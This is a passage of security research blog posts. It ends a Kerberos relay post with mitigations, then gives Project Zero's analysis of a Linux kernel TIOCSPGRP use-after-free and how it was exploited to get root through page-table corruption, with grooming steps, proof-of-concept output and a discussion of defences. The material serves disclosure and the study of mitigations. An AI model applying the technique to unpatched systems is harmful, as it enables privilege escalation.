How can you defend yourself against authentication relay attacks presented in this blog post? While I think I've made the case that it's possible to relay Kerberos authentication, it's somewhat more limited in scope than NTLM relay. This means that disabling NTLM is still an invaluable option for mitigating authentication relay issues on a Windows enterprise network.

Also, except for disabling NTLM, all the mitigations for NTLM relay apply to Kerberos relay. Requiring signing or sealing on the protocol if possible is sufficient to prevent the majority of attack vectors, especially on important network services such as LDAP.

For TLS encapsulated protocols, channel binding prevents the authentication being relayed as I didn't find any way of spoofing the TLS certificate at the same time. If the network service supports EPA, such as HTTPS or LDAPS it should be enabled. Even if the protocol doesn't support EPA, enabling TLS protection if possible is still valuable. This not only provides more robust server authentication, which Kerberos mutual authentication doesn't really provide, it'll also hide Kerberos authentication tokens from sniffing or MitM attacks.

Some libraries, such as WinHTTP and .NET set the undocumented ISC_REQ_UNVERIFIED_TARGET_NAME request attribute when calling InitializeSecurityContext in certain circumstances. This affects the behavior of the server when querying for the SPN used during authentication. Some servers such as SMB and IIS with EPA can be configured to validate the SPN. If this request attribute flag is set then while the authentication will succeed when the server goes to check the SPN, it gets an empty string which will not match the server's expectations. If you're a developer you should use this flag if the SPN has been provided from an untrustworthy source, although this will only be beneficial if the server is checking the received SPN.

A common thread through the research is abusing local DNS resolution to spoof the SPN. Disabling LLMNR and MDNS should always be best practice, and this just highlights the dangers of leaving them enabled. While it might be possible to perform the same attacks through DNS spoofing attacks, these are likely to be much less reliable than local DNS spoofing attacks.

If Windows authentication isn't needed from a network client, it'd be wise to disable it if supported. For example, some HTTP user agents support disabling automatic Windows authentication entirely, while others such as Firefox don't enable it by default. Chromium also supports disabling the DNS lookup process for generating the SPN through group policy.

Finally, blocking untrusted devices on the network such as through 802.1X or requiring authenticated IPsec/IKEv2 for all network communications to high value services would go some way to limiting the impact of all authentication relay attacks. Although of course, an attacker could still compromise a trusted host and use that to mount the attack.

Conclusions

I hope that this blog post has demonstrated that Kerberos relay attacks are feasible and just disabling NTLM is not a sufficient mitigation strategy in an enterprise environment. While DNS is a common thread and is the root cause of the majority of these protocol issues, it's still possible to spoof SPNs using other protocols such as AuthIP and MSRPC without needing to play DNS tricks.

While I wrote my own tooling to perform the LLMNR attack there are various public tools which can mount an LLMNR and MDNS spoofing attack such as the venerable Python Responder. It shouldn't be hard to modify one of the tools to verify my findings.

I've also not investigated every possible network protocol which might perform Kerberos authentication. I've also not looked at non-Windows systems which might support Kerberos such as Linux and macOS. It's possible that in more heterogeneous networks the impact might be more pronounced as some of the security changes in Microsoft's Kerberos implementation might not be present.

If you're doing your own research into this area, you should look at how the SPN is specified by the protocol, but also how the implementation builds it. For example the HTTP Negotiate RFC states how to build the SPN for Kerberos, but then each implementation does it slightly differently and not to the RFC specification.

You should be especially wary of any protocol where an untrusted server can specify an arbitrary SPN. This is the case in AuthIP, MSRPC and DCOM. It's almost certain that when these protocols were originally designed many years ago, that no thought was given to the possible abuse of this design for relaying the Kerberos network authentication.

How a simple Linux kernel memory corruption bug can lead to complete system compromise

An analysis of current and potential kernel security mitigations

Posted by Jann Horn, Project Zero

Introduction

This blog post describes a straightforward Linux kernel locking bug and how I exploited it against Debian Buster's 4.19.0-13-amd64 kernel. Based on that, it explores options for security mitigations that could prevent or hinder exploitation of issues similar to this one.

I hope that stepping through such an exploit and sharing this compiled knowledge with the wider security community can help with reasoning about the relative utility of various mitigation approaches.

A lot of the individual exploitation techniques and mitigation options that I am describing here aren't novel. However, I believe that there is value in writing them up together to show how various mitigations interact with a fairly normal use-after-free exploit.

Our bugtracker entry for this bug, along with the proof of concept, is at https://bugs.chromium.org/p/project-zero/issues/detail?id=2125.

Code snippets in this blog post that are relevant to the exploit are taken from the upstream 4.19.160 release, since that is what the targeted Debian kernel is based on; some other code snippets are from mainline Linux.

(In case you're wondering why the bug and the targeted Debian kernel are from end of last year: I already wrote most of this blogpost around April, but only recently finished it)

I would like to thank Ryan Hileman for a discussion we had a while back about how static analysis might fit into static prevention of security bugs (but note that Ryan hasn't reviewed this post and doesn't necessarily agree with any of my opinions). I also want to thank Kees Cook for providing feedback on an earlier version of this post (again, without implying that he necessarily agrees with everything), and my Project Zero colleagues for reviewing this post and frequent discussions about exploit mitigations.

Background for the bug

On Linux, terminal devices (such as a serial console or a virtual console) are represented by a struct tty_struct. Among other things, this structure contains fields used for the job control features of terminals, which are usually modified using a set of ioctls:

struct tty_struct {
[...]
        spinlock_t ctrl_lock;
[...]
        struct pid *pgrp;               /* Protected by ctrl lock */
        struct pid *session;
[...]
        struct tty_struct *link;
[...]
}[...];

The pgrp field points to the foreground process group of the terminal (normally modified from userspace via the TIOCSPGRP ioctl); the session field points to the session associated with the terminal. Both of these fields do not point directly to a process/task, but rather to a struct pid. struct pid ties a specific incarnation of a numeric ID to a set of processes that use that ID as their PID (also known in userspace as TID), TGID (also known in userspace as PID), PGID, or SID. You can kind of think of it as a weak reference to a process, although that's not entirely accurate. (There's some extra nuance around struct pid when execve() is called by a non-leader thread, but that's irrelevant here.)

All processes that are running inside a terminal and are subject to its job control refer to that terminal as their "controlling terminal" (stored in ->signal->tty of the process).

A special type of terminal device are pseudoterminals, which are used when you, for example, open a terminal application in a graphical environment or connect to a remote machine via SSH. While other terminal devices are connected to some sort of hardware, both ends of a pseudoterminal are controlled by userspace, and pseudoterminals can be freely created by (unprivileged) userspace. Every time /dev/ptmx (short for "pseudoterminal multiplexor") is opened, the resulting file descriptor represents the device side (referred to in documentation and kernel sources as "the pseudoterminal master") of a new pseudoterminal . You can read from it to get the data that should be printed on the emulated screen, and write to it to emulate keyboard inputs. The corresponding terminal device (to which you'd usually connect a shell) is automatically created by the kernel under /dev/pts/<number>.

One thing that makes pseudoterminals particularly strange is that both ends of the pseudoterminal have their own struct tty_struct, which point to each other using the link member, even though the device side of the pseudoterminal does not have terminal features like job control - so many of its members are unused.

Many of the ioctls for terminal management can be used on both ends of the pseudoterminal; but no matter on which end you call them, they affect the same state, sometimes with minor differences in behavior. For example, in the ioctl handler for TIOCGPGRP:

/**
 *      tiocgpgrp               -       get process group
 *      @tty: tty passed by user
 *      @real_tty: tty side of the tty passed by the user if a pty else the tty
 *      @p: returned pid
 *
 *      Obtain the process group of the tty. If there is no process group
 *      return an error.
 *
 *      Locking: none. Reference to current->signal->tty is safe.
 */
static int tiocgpgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
        struct pid *pid;
        int ret;
        /*
         * (tty == real_tty) is a cheap way of
         * testing if the tty is NOT a master pty.
         */
        if (tty == real_tty && current->signal->tty != real_tty)
                return -ENOTTY;
        pid = tty_get_pgrp(real_tty);
        ret =  put_user(pid_vnr(pid), p);
        put_pid(pid);
        return ret;
}

As documented in the comment above, these handlers receive a pointer real_tty that points to the normal terminal device; an additional pointer tty is passed in that can be used to figure out on which end of the terminal the ioctl was originally called. As this example illustrates, the tty pointer is normally only used for things like pointer comparisons. In this case, it is used to prevent TIOCGPGRP from working when called on the terminal side by a process which does not have this terminal as its controlling terminal.

Note: If you want to know more about how terminals and job control are intended to work, the book "The Linux Programming Interface" provides a nice introduction to how these older parts of the userspace API are supposed to work. It doesn't describe any of the kernel internals though, since it's written as a reference for userspace programming. And it's from 2010, so it doesn't have anything in it about new APIs that have showed up over the last decade.

The bug

The bug was in the ioctl handler tiocspgrp:

/**
 *      tiocspgrp               -       attempt to set process group
 *      @tty: tty passed by user
 *      @real_tty: tty side device matching tty passed by user
 *      @p: pid pointer
 *
 *      Set the process group of the tty to the session passed. Only
 *      permitted where the tty session is our session.
 *
 *      Locking: RCU, ctrl lock
 */
static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
        struct pid *pgrp;
        pid_t pgrp_nr;
[...]
        if (get_user(pgrp_nr, p))
                return -EFAULT;
[...]
        pgrp = find_vpid(pgrp_nr);
[...]
        spin_lock_irq(&tty->ctrl_lock);
        put_pid(real_tty->pgrp);
        real_tty->pgrp = get_pid(pgrp);
        spin_unlock_irq(&tty->ctrl_lock);
[...]
}

The pgrp member of the terminal side (real_tty) is being modified, and the reference counts of the old and new process group are adjusted accordingly using put_pid and get_pid; but the lock is taken on tty, which can be either end of the pseudoterminal pair, depending on which file descriptor we pass to ioctl(). So by simultaneously calling the TIOCSPGRP ioctl on both sides of the pseudoterminal, we can cause data races between concurrent accesses to the pgrp member. This can cause reference counts to become skewed through the following races:

  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
    spin_lock_irq(...)                  spin_lock_irq(...)
    put_pid(old_pid)
                                        put_pid(old_pid)
    real_tty->pgrp = get_pid(A)
                                        real_tty->pgrp = get_pid(B)
    spin_unlock_irq(...)                spin_unlock_irq(...)
  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
    spin_lock_irq(...)                  spin_lock_irq(...)
    put_pid(old_pid)
                                        put_pid(old_pid)
                                        real_tty->pgrp = get_pid(B)
    real_tty->pgrp = get_pid(A)
    spin_unlock_irq(...)                spin_unlock_irq(...)

In both cases, the refcount of the old struct pid is decremented by 1 too much, and either A's or B's is incremented by 1 too much.

Once you understand the issue, the fix seems relatively obvious:

    if (session_of_pgrp(pgrp) != task_session(current))
        goto out_unlock;
    retval = 0;
-   spin_lock_irq(&tty->ctrl_lock);
+   spin_lock_irq(&real_tty->ctrl_lock);
    put_pid(real_tty->pgrp);
    real_tty->pgrp = get_pid(pgrp);
-   spin_unlock_irq(&tty->ctrl_lock);
+   spin_unlock_irq(&real_tty->ctrl_lock);
 out_unlock:
    rcu_read_unlock();
    return retval;

Attack stages

In this section, I will first walk through how my exploit works; afterwards I will discuss different defensive techniques that target these attack stages.

Attack stage: Freeing the object with multiple dangling references

This bug allows us to probabilistically skew the refcount of a struct pid down, depending on which way the race happens: We can run colliding TIOCSPGRP calls from two threads repeatedly, and from time to time that will mess up the refcount. But we don't immediately know how many times the refcount skew has actually happened.

What we'd really want as an attacker is a way to skew the refcount deterministically. We'll have to somehow compensate for our lack of information about whether the refcount was skewed successfully. We could try to somehow make the race deterministic (seems difficult), or after each attempt to skew the refcount assume that the race worked and run the rest of the exploit (since if we didn't skew the refcount, the initial memory corruption is gone, and nothing bad will happen), or we can attempt to find an information leak that lets us figure out the state of the reference count.

On typical desktop/server distributions, the following approach works (unreliably, depending on RAM size) for setting up a freed struct pid with multiple dangling references:

  1. Allocate a new struct pid (by creating a new task).
  2. Create a large number of references to it (by sending messages with SCM_CREDENTIALS to unix domain sockets, and leaving those messages queued up).
  3. Repeatedly trigger the TIOCSPGRP race to skew the reference count downwards, with the number of attempts chosen such that we expect that the resulting refcount skew is bigger than the number of references we need for the rest of our attack, but smaller than the number of extra references we created.
  4. Let the task owning the pid exit and die, and wait for RCU (read-copy-update, a mechanism that involves delaying the freeing of some objects) to settle such that the task's reference to the pid is gone. (Waiting for an RCU grace period from userspace is not a primitive that is intentionally exposed through the UAPI, but there are various ways userspace can do it - e.g. by testing when a released BPF program's memory is subtracted from memory accounting, or by abusing the membarrier(MEMBARRIER_CMD_GLOBAL, ...) syscall after the kernel version where RCU flavors were unified.)
  5. Create a new thread, and let that thread attempt to drop all the references we created.

Because the refcount is smaller at the start of step 5 than the number of references we are about to drop, the pid will be freed at some point during step 5; the next attempt to drop a reference will cause a use-after-free:

struct upid {
        int nr;
        struct pid_namespace *ns;
};

struct pid
{
        atomic_t count;
        unsigned int level;
        /* lists of tasks that use this pid */
        struct hlist_head tasks[PIDTYPE_MAX];
        struct rcu_head rcu;
        struct upid numbers[1];
};
[...]
void put_pid(struct pid *pid)
{
        struct pid_namespace *ns;

        if (!pid)
                return;

        ns = pid->numbers[pid->level].ns;
        if ((atomic_read(&pid->count) == 1) ||
             atomic_dec_and_test(&pid->count)) {
                kmem_cache_free(ns->pid_cachep, pid);
                put_pid_ns(ns);
        }
}

When the object is freed, the SLUB allocator normally replaces the first 8 bytes (sidenote: a different position is chosen starting in 5.7, see Kees' blog) of the freed object with an XOR-obfuscated freelist pointer; therefore, the count and level fields are now effectively random garbage. This means that the load from pid->numbers[pid->level] will now be at some random offset from the pid, in the range from zero to 64 GiB. As long as the machine doesn't have tons of RAM, this will likely cause a kernel segmentation fault. (Yes, I know, that's an absolutely gross and unreliable way to exploit this. It mostly works though, and I only noticed this issue when I already had the whole thing written, so I didn't really want to go back and change it... plus, did I mention that it mostly works?)

Linux in its default configuration, and the configuration shipped by most general-purpose distributions, attempts to fix up unexpected kernel page faults and other types of "oopses" by killing only the crashing thread. Therefore, this kernel page fault is actually useful for us as a signal: Once the thread has died, we know that the object has been freed, and can continue with the rest of the exploit.

If this code looked a bit differently and we were actually reaching a double-free, the SLUB allocator would also detect that and trigger a kernel oops (see set_freepointer() for the CONFIG_SLAB_FREELIST_HARDENED case).

Discarded attack idea: Directly exploiting the UAF at the SLUB level

On the Debian kernel I was looking at, a struct pid in the initial namespace is allocated from the same kmem_cache as struct seq_file and struct epitem - these three slabs have been merged into one by find_mergeable() to reduce memory fragmentation, since their object sizes, alignment requirements, and flags match:

root@deb10:/sys/kernel/slab# ls -l pid
lrwxrwxrwx 1 root root 0 Feb  6 00:09 pid -> :A-0000128
root@deb10:/sys/kernel/slab# ls -l | grep :A-0000128
drwxr-xr-x 2 root root 0 Feb  6 00:09 :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 eventpoll_epi -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 pid -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 seq_file -> :A-0000128
root@deb10:/sys/kernel/slab# 

A straightforward way to exploit a dangling reference to a SLUB object is to reallocate the object through the same kmem_cache it came from, without ever letting the page reach the page allocator. To figure out whether it's easy to exploit this bug this way, I made a table listing which fields appear at each offset in these three data structures (using pahole -E --hex -C <typename> <path to vmlinux debug info>):

offset pid eventpoll_epi / epitem (RCU-freed) seq_file
0x00 count.counter (4) (CONTROL) rbn.__rb_parent_color (8) (TARGET?) buf (8) (TARGET?)
0x04 level (4)
0x08 tasks[PIDTYPE_PID] (8) rbn.rb_right (8) / rcu.func (8) size (8)
0x10 tasks[PIDTYPE_TGID] (8) rbn.rb_left (8) from (8)
0x18 tasks[PIDTYPE_PGID] (8) rdllink.next (8) count (8)
0x20 tasks[PIDTYPE_SID] (8) rdllink.prev (8) pad_until (8)
0x28 rcu.next (8) next (8) index (8)
0x30 rcu.func (8) ffd.file (8) read_pos (8)
0x38 numbers[0].nr (4) ffd.fd (4) version (8)
0x3c [hole] (4) nwait (4)
0x40 numbers[0].ns (8) pwqlist.next (8) lock (0x20): counter (8)
0x48 --- pwqlist.prev (8)
0x50 --- ep (8)
0x58 --- fllink.next (8)
0x60 --- fllink.prev (8) op (8)
0x68 --- ws (8) poll_event (4)
0x6c --- [hole] (4)
0x70 --- event.events (4) file (8)
0x74 --- event.data (8) (CONTROL)
0x78 --- private (8) (TARGET?)
0x7c --- ---
0x80 --- --- ---

In this case, reallocating the object as one of those three types didn't seem to me like a nice way forward (although it should be possible to exploit this somehow with some effort, e.g. by using count.counter to corrupt the buf field of seq_file). Also, some systems might be using the slab_nomerge kernel command line flag, which disables this merging behavior.

Another approach that I didn't look into here would have been to try to corrupt the obfuscated SLUB freelist pointer (obfuscation is implemented in freelist_ptr()); but since that stores the pointer in big-endian, count.counter would only effectively let us corrupt the more significant half of the pointer, which would probably be a pain to exploit.

Attack stage: Freeing the object's page to the page allocator

This section will refer to some internals of the SLUB allocator; if you aren't familiar with those, you may want to at least look at slides 2-4 and 13-14 of Christoph Lameter's slab allocator overview talk from 2014. (Note that that talk covers three different allocators; the SLUB allocator is what most systems use nowadays.)

The alternative to exploiting the UAF at the SLUB allocator level is to flush the page out to the page allocator (also called the buddy allocator), which is the last level of dynamic memory allocation on Linux (once the system is far enough into the boot process that the memblock allocator is no longer used). From there, the page can theoretically end up in pretty much any context. We can flush the page out to the page allocator with the following steps:

  1. Instruct the kernel to pin our task to a single CPU. Both SLUB and the page allocator use per-cpu structures; so if the kernel migrates us to a different CPU in the middle, we would fail.
  2. Before allocating the victim struct pid whose refcount will be corrupted, allocate a large number of objects to drain partially-free slab pages of all their unallocated objects. If the victim object (which will be allocated in step 5 below) landed in a page that is already partially used at this point, we wouldn't be able to free that page.
  3. Allocate around objs_per_slab * (1+cpu_partial) objects - in other words, a set of objects that completely fill at least cpu_partial pages, where cpu_partial is the maximum length of the "percpu partial list". Those newly allocated pages that are completely filled with objects are not referenced by SLUB's freelists at this point because SLUB only tracks pages with free objects on its freelists.
  4. Fill objs_per_slab-1 more objects, such that at the end of this step, the "CPU slab" (the page from which allocations will be served first) will not contain anything other than free space and fresh allocations (created in this step).
  5. Allocate the victim object (a struct pid). The victim page (the page from which the victim object came) will usually be the CPU slab from step 4, but if step 4 completely filled the CPU slab, the victim page might also be a new, freshly allocated CPU slab.
  6. Trigger the bug on the victim object to create an uncounted reference, and free the object.
  7. Allocate objs_per_slab+1 more objects. After this, the victim page will be completely filled with allocations from steps 4 and 7, and it won't be the CPU slab anymore (because the last allocation can not have fit into the victim page).
  8. Free all allocations from steps 4 and 7. This causes the victim page to become empty, but does not free the page; the victim page is placed on the percpu partial list once a single object from that page has been freed, and then stays on that list.
  9. Free one object per page from the allocations from step 3. This adds all these pages to the percpu partial list until it reaches the limit cpu_partial, at which point it will be flushed: Pages containing some in-use objects are placed on SLUB's per-NUMA-node partial list, and pages that are completely empty are freed back to the page allocator. (We don't free all allocations from step 3 because we only want the victim page to be freed to the page allocator.) Note that this step requires that every objs_per_slab-th object the allocator gave us in step 3 is on a different page.

When the page is given to the page allocator, we benefit from the page being order-0 (4 KiB, native page size): For order-0 pages, the page allocator has special freelists, one per CPU+zone+migratetype combination. Pages on these freelists are not normally accessed from other CPUs, and they don't immediately get combined with adjacent free pages to form higher-order free pages.

At this point we are able to perform use-after-free accesses to some offset inside the free victim page, using codepaths that interpret part of the victim page as a struct pid. Note that at this point, we still don't know exactly at which offset inside the victim page the victim object is located.

Attack stage: Reallocating the victim page as a pagetable

At the point where the victim page has reached the page allocator's freelist, it's essentially game over - at this point, the page can be reused as anything in the system, giving us a broad range of options for exploitation. In my opinion, most defences that act after we've reached this point are fairly unreliable.

One type of allocation that is directly served from the page allocator and has nice properties for exploitation are page tables (which have also been used to exploit Rowhammer). One way to abuse the ability to modify a page table would be to enable the read/write bit in a page table entry (PTE) that maps a file page to which we are only supposed to have read access - for example, this could be used to gain write access to part of a setuid binary's .text segment and overwrite it with malicious code.

We don't know at which offset inside the victim page the victim object is located; but since a page table is effectively an array of 8-byte-aligned elements of size 8 and the victim object's alignment is a multiple of that, as long as we spray all elements of the victim array, we don't need to know the victim object's offset.

To allocate a page table full of PTEs mapping the same file page, we have to:

  • prepare by setting up a 2MiB-aligned memory region (because each last-level page table describes 2MiB of virtual memory) containing single-page mmap() mappings of the same file page (meaning each mapping corresponds to one PTE); then
  • trigger allocation of the page table and fill it with PTEs by reading from each mapping

struct pid has the same alignment as a PTE, and it starts with a 32-bit refcount, so that refcount is guaranteed to overlap the first half of a PTE, which is 64-bit. Because X86 CPUs are little-endian, incrementing the refcount field in the freed struct pid increments the least significant half of the PTE - so it effectively increments the PTE. (Except for the edge case where the least significant half is 0xffffffff, but that's not the case here.)

struct pid: count | level |   tasks[0]  |   tasks[1]  |   tasks[2]  | ... 
pagetable:       PTE      |     PTE     |     PTE     |     PTE     | ...

Therefore we can increment one of the PTEs by repeatedly triggering get_pid(), which tries to increment the refcount of the freed object. This can be turned into the ability to write to the file page as follows:

  • Increment the PTE by 0x42 to set the Read/Write bit and the Dirty bit. (If we didn't set the Dirty bit, the CPU would do it by itself when we write to the corresponding virtual address, so we could also just increment by 0x2 here.)
  • For each mapping, attempt to overwrite its contents with malicious data and ignore page faults.
    • This might throw spurious errors because of outdated TLB entries, but taking a page fault will automatically evict such TLB entries, so if we just attempt the write twice, this can't happen on the second write (modulo CPU migration, as mentioned above).
    • One easy way to ignore page faults is to let the kernel perform the memory write using pread(), which will return -EFAULT on fault.

If the kernel notices the Dirty bit later on, that might trigger writeback, which could crash the kernel if the mapping isn't set up for writing. Therefore, we have to reset the Dirty bit. We can't reliably decrement the PTE because put_pid() inefficiently accesses pid->numbers[pid->level] even when the refcount isn't dropping to zero, but we can increment it by an additional 0x80-0x42=0x3e, which means the final value of the PTE, compared to the initial value, will just have the additional bit 0x80 set, which the kernel ignores.

Afterwards, we launch the setuid executable (which, in the version in the pagecache, now contains the code we injected), and gain root privileges:

user@deb10:~/tiocspgrp$ make
as -o rootshell.o rootshell.S
ld -o rootshell rootshell.o --nmagic
gcc -Wall -o poc poc.c
user@deb10:~/tiocspgrp$ ./poc
starting up...
executing in first level child process, setting up session and PTY pair...
setting up unix sockets for ucreds spam...
draining pcpu and node partial pages
preparing for flushing pcpu partial pages
launching child process
child is 1448
ucreds spam done, struct pid refcount should be lifted. starting to skew refcount...
refcount should now be skewed, child exiting
child exited cleanly
waiting for RCU call...
bpf load with rlim 0x0: -1 (Operation not permitted)
bpf load with rlim 0x1000: 452 (Success)
bpf load success with rlim 0x1000: got fd 452
....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
RCU callbacks executed
gonna try to free the pid...
double-free child died with signal 9 after dropping 9990 references (99%)
hopefully reallocated as an L1 pagetable now
PTE forcibly marked WRITE | DIRTY (hopefully)
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
bash: cannot set terminal process group (1447): Inappropriate ioctl for device
bash: no job control in this shell
root@deb10:/home/user/tiocspgrp# id
uid=0(root) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),113(scanner),120(wireshark)
root@deb10:/home/user/tiocspgrp# 

Note that nothing in this whole exploit requires us to leak any kernel-virtual or physical addresses, partly because we have an increment primitive instead of a plain write; and it also doesn't involve directly influencing the instruction pointer.

Defence

This section describes different ways in which this exploit could perhaps have been prevented from working. To assist the reader, the titles of some of the subsections refer back to specific exploit stages from the section above.

Against bugs being reachable: Attack surface reduction

A potential first line of defense against many kernel security issues is to only make kernel subsystems available to code that needs access to them. If an attacker does not have direct access to a vulnerable subsystem and doesn't have sufficient influence over a system component with access to make it trigger the issue, the issue is effectively unexploitable from the attacker's security context.

Pseudoterminals are (more or less) only necessary for interactively serving users who have shell access (or something resembling that), including:

  • terminal emulators inside graphical user sessions
  • SSH servers
  • screen sessions started from various types of terminals

Things like webservers or phone apps won't normally need access to such devices; but there are exceptions. For example:

  • a web server is used to provide a remote root shell for system administration
  • a phone app's purpose is to make a shell available to the user
  • a shell script uses expect to interact with a binary that requires a terminal for input/output

In my opinion, the biggest limits on attack surface reduction as a defensive strategy are:

  1. It exposes a workaround to an implementation concern of the kernel (potential memory safety issues) in user-facing API, which can lead to compatibility issues and maintenance overhead - for example, from a security standpoint, I think it might be a good idea to require phone apps and systemd services to declare their intention to use the PTY subsystem at install time, but that would be an API change requiring some sort of action from application authors, creating friction that wouldn't be necessary if we were confident that the kernel is working properly. This might get especially messy in the case of software that invokes external binaries depending on configuration, e.g. a web server that needs PTY access when it is used for server administration. (This is somewhat less complicated when a benign-but-potentially-exploitable application actively applies restrictions to itself; but not every application author is necessarily willing to design a fine-grained sandbox for their code, and even then, there may be compatibility issues caused by libraries outside the application author's control.)
  2. It can't protect a subsystem from a context that fundamentally needs access to it. (E.g. Android's /dev/binder is directly accessible by Chrome renderers on Android because they have Android code running inside them.)
  3. It means that decisions that ought to not influence the security of a system (making an API that does not grant extra privileges available to some potentially-untrusted context) essentially involve a security tradeoff.

Still, in practice, I believe that attack surface reduction mechanisms (especially seccomp) are currently some of the most important defense mechanisms on Linux.

Against bugs in source code: Compile-time locking validation

The bug in TIOCSPGRP was a fairly straightforward violation of a straightforward locking rule: While a tty_struct is live, accessing its pgrp member is forbidden unless the ctrl_lock of the same tty_struct is held. This rule is sufficiently simple that it wouldn't be entirely unreasonable to expect the compiler to be able to verify it - as long as you somehow inform the compiler about this rule, because figuring out the intended locking rules just from looking at a piece of code can often be hard even for humans (especially when some of the code is incorrect).

When you are starting a new project from scratch, the overall best way to approach this is to use a memory-safe language - in other words, a language that has explicitly been designed such that the programmer has to provide the compiler with enough information about intended memory safety semantics that the compiler can automatically verify them. But for existing codebases, it might be worth looking into how much of this can be retrofitted.

Clang's Thread Safety Analysis feature does something vaguely like what we'd need to verify the locking in this situation:

$ nl -ba -s' ' thread-safety-test.cpp | sed 's|^   ||'
  1 struct __attribute__((capability("mutex"))) mutex {
  2 };
  3 
  4 void lock_mutex(struct mutex *p) __attribute__((acquire_capability(*p)));
  5 void unlock_mutex(struct mutex *p) __attribute__((release_capability(*p)));
  6 
  7 struct foo {
  8     int a __attribute__((guarded_by(mutex)));
  9     struct mutex mutex;
 10 };
 11 
 12 int good(struct foo *p1, struct foo *p2) {
 13     lock_mutex(&p1->mutex);
 14     int result = p1->a;
 15     unlock_mutex(&p1->mutex);
 16     return result;
 17 }
 18 
 19 int bogus(struct foo *p1, struct foo *p2) {
 20     lock_mutex(&p1->mutex);
 21     int result = p2->a;
 22     unlock_mutex(&p1->mutex);
 23     return result;
 24 }
$ clang++ -c -o thread-safety-test.o thread-safety-test.cpp -Wall -Wthread-safety
thread-safety-test.cpp:21:22: warning: reading variable 'a' requires holding mutex 'p2->mutex' [-Wthread-safety-precise]
    int result = p2->a;
                     ^
thread-safety-test.cpp:21:22: note: found near match 'p1->mutex'
1 warning generated.
$ 

However, this does not currently work when compiling as C code because the guarded_by attribute can't find the other struct member; it seems to have been designed mostly for use in C++ code. A more fundamental problem is that it also doesn't appear to have built-in support for distinguishing the different rules for accessing a struct member depending on the lifetime state of the object. For example, almost all objects with locked members will have initialization/destruction functions that have exclusive access to the entire object and can access members without locking. (The lock might not even be initialized in those states.)

Some objects also have more lifetime states; in particular, for many objects with RCU-managed lifetime, only a subset of the members may be accessed through an RCU reference without having upgraded the reference to a refcounted one beforehand. Perhaps this could be addressed by introducing a new type attribute that can be used to mark pointers to structs in special lifetime states? (For C++ code, Clang's Thread Safety Analysis simply disables all checks in all constructor/destructor functions.)

I am hopeful that, with some extensions, something vaguely like Clang's Thread Safety Analysis could be used to retrofit some level of compile-time safety against unintended data races. This will require adding a lot of annotations, in particular to headers, to document intended locking semantics; but such annotations are probably anyway necessary to enable productive work on a complex codebase. In my experience, when there are no detailed comments/annotations on locking rules, every attempt to change a piece of code you're not intimately familiar with (without introducing horrible memory safety bugs) turns into a foray into the thicket of the surrounding call graphs, trying to unravel the intentions behind the code.

The one big downside is that this requires getting the development community for the codebase on board with the idea of backfilling and maintaining such annotations. And someone has to write the analysis tooling that can verify the annotations.

At the moment, the Linux kernel does have some very coarse locking validation via sparse; but this infrastructure is not capable of detecting situations where the wrong lock is used or validating that a struct member is protected by a lock. It also can't properly deal with things like conditional locking, which makes it hard to use for anything other than spinlocks/RCU. The kernel's runtime locking validation via LOCKDEP is more advanced, but mostly with a focus on locking correctness of RCU pointers as well as deadlock detection (the main focus); again, there is no mechanism to, for example,automatically validate that a given struct member is only accessed under a specific lock (which would probably also be quite costly to implement with runtime validation). Also, as a runtime validation mechanism, it can't discover errors in code that isn't executed during testing (although it can combine separately observed behavior into race scenarios without ever actually observing the race).

Against bugs in source code: Global static locking analysis

An alternative approach to checking memory safety rules at compile time is to do it either after the entire codebase has been compiled, or with an external tool that analyzes the entire codebase. This allows the analysis tooling to perform analysis across compilation units, reducing the amount of information that needs to be made explicit in headers. This may be a more viable approach if peppering annotations everywhere across headers isn't viable; but it also reduces the utility to human readers of the code, unless the inferred semantics are made visible to them through some special code viewer. It might also be less ergonomic in the long run if changes to one part of the kernel could make the verification of other parts fail - especially if those failures only show up in some configurations.

I think global static analysis is probably a good tool for finding some subsets of bugs, and it might also help with finding the worst-case depth of kernel stacks or proving the absence of deadlocks, but it's probably less suited for proving memory safety correctness?

Against exploit primitives: Attack primitive reduction via syscall restrictions

(Yes, I made up that name because I thought that capturing this under "Attack surface reduction" is too muddy.)

Because allocator fastpaths (both in SLUB and in the page allocator) are implemented using per-CPU data structures, the ease and reliability of exploits that want to coax the kernel's memory allocators into reallocating memory in specific ways can be improved if the attacker has fine-grained control over the assignment of exploit threads to CPU cores. I'm calling such a capability, which provides a way to facilitate exploitation by influencing relevant system state/behavior, an "attack primitive" here. Luckily for us, Linux allows tasks to pin themselves to specific CPU cores without requiring any privilege using the sched_setaffinity() syscall.

(As a different example, one primitive that can provide an attacker with fairly powerful capabilities is being able to indefinitely stall kernel faults on userspace addresses via FUSE or userfaultfd.)

Just like in the section "Attack surface reduction" above, an attacker's ability to use these primitives can be reduced by filtering syscalls; but while the mechanism and the compatibility concerns are similar, the rest is fairly different:

Attack primitive reduction does not normally reliably prevent a bug from being exploited; and an attacker will sometimes even be able to obtain a similar but shoddier (more complicated, less reliable, less generic, ...) primitive indirectly, for example:

Attack surface reduction is about limiting access to code that is suspected to contain exploitable bugs; in a codebase written in a memory-unsafe language, that tends to apply to pretty much the entire codebase. Attack surface reduction is often fairly opportunistic: You permit the things you need, and deny the rest by default.

Attack primitive reduction limits access to code that is suspected or known to provide (sometimes very specific) exploitation primitives. For example, one might decide to specifically forbid access to FUSE and userfaultfd for most code because of their utility for kernel exploitation, and, if one of those interfaces is truly needed, design a workaround that avoids exposing the attack primitive to userspace. This is different from attack surface reduction, where it often makes sense to permit access to any feature that a legitimate workload wants to use.

